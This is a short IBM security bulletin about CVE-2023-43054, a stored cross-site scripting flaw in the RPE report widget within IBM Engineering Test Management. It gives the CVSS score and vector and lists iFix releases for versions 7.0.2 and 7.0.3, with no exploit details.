Security Bulletin: Stored XSS executing on RPE report widget when run from within ETM

Summary

Stored XSS issue on the RPE report widget has been addressed in RPE and no more seen in IBM Engineering Test Management

Vulnerability Details

CVEID:CVE-2023-43054
**DESCRIPTION:**IBM Engineering Test Management is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
CVSS Base score: 6.4
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/267459 for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)

Affected Products and Versions

Remediation/Fixes

IBM strongly recommends addressing the vulnerability now by upgrading and applying the suggested fix that uses upgraded version of XStream.

Suggested :

Product(s)|**Version(s)
**|Remediation/Fix/Instructions
—|—|—
IBM Engineering Test Management | 7.0.2|

Search for, Download and apply ETM 7.0.2 iFix028 from Fix Central here

IBM Engineering Test Management | 7.0.3| Search for, Download and apply ETM 7.0.3 iFix003 from Fix Central here

Workarounds and Mitigations

None